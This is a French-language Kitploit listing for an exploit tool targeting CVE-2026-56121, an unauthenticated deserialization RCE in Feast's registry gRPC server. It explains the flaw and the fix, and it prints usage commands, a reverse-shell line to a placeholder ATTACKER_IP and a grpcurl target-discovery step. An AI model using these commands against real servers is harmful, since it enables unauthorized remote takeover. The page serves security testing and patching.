Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-56121_exploit — Exploit RCE non authentifié pour le serveur gRPC du registre Feast (CVE-2026-56121) utilisant la désérialisation dill. Inclut la génération de payload, le support de reverse shell, et l'identification des cibles via la réflexion gRPC. | Kitploit
Outils/GitHubGitHub/0xdak/cve-2026-56121_exploit
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et ÉducationDéveloppement de Charges Utiles
GitHub0xdak/cve-2026-56121_exploit

CVE-2026-56121_exploit

Exploit RCE non authentifié pour le serveur gRPC du registre Feast (CVE-2026-56121) utilisant la désérialisation dill. Inclut la génération de payload, le support de reverse shell, et l'identification des cibles via la réflexion gRPC.

Voir le dépôt
12il y a 1 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2026-56121 — RCE non authentifiée dans le registre Feast (dill.loads)

Exécution de code à distance non authentifiée dans le serveur gRPC du registre du feature store Feast.

Le RPC ApplyFeatureView reconstruit un OnDemandFeatureView à partir du proto de la requête. Pour ce faire, il décode en base64 spec.user_defined_function.body et le transmet à dill.loads() — avant toute vérification d'autorisation. dill est un sur-ensemble de pickle, donc un objet dont __reduce__ renvoie (os.system, (cmd,)) exécute une commande arbitraire au moment où le serveur le désérialise. Le déploiement par défaut fournit , donc une seule requête gRPC non authentifiée sur le port du registre suffit.

auth: no_auth
  • Affecté : Feast < 0.63.0
  • Corrigé dans : Feast 0.63.0
  • Port par défaut : 6570 (registre gRPC)
  • CWE : 502 (Désérialisation de données non fiables)
  • Impact : RCE en tant qu'utilisateur du service de registre (souvent l'ensemble du plan de contrôle du feature store)

Prérequis

L'exploit réutilise les protos gRPC générés par Feast lui-même, installez donc une version vulnérable de Feast du côté de l'attaquant :

root@kitploit:~
python3 -m venv venv && . venv/bin/activate
pip install "feast==0.62.0" grpcio

Utilisation

root@kitploit:~
# quick check (output appears on the SERVER, not locally)
python3 exploit.py 10.10.10.10:6570 -c "id"

# reverse shell (bash -c wrapper: os.system uses /bin/sh, which lacks /dev/tcp)
python3 exploit.py 10.10.10.10:6570 -c 'bash -c "bash -i >& /dev/tcp/ATTACKER_IP/443 0>&1"'

-p/--project définit le nom du projet (par défaut feature_repo). La sortie de la commande s'imprime sur stdout/journal de l'hôte du registre, utilisez donc un reverse shell ou écrivez dans un chemin lisible pour observer les résultats.

Identifier une cible

Le registre a la réflexion gRPC activée :

root@kitploit:~
grpcurl -plaintext 10.10.10.10:6570 list
# feast.registry.RegistryServer
# grpc.health.v1.Health
# grpc.reflection.v1alpha.ServerReflection

Remédiation

Mettez à niveau vers Feast 0.63.0+, activez un backend d'authentification et n'exposez jamais le port gRPC du registre à des réseaux non fiables.

Avertissement

Pour les tests de sécurité autorisés et l'éducation uniquement. Utilisez-le uniquement contre des systèmes que vous possédez ou pour lesquels vous avez une autorisation explicite de tester.

Télécharger l’outil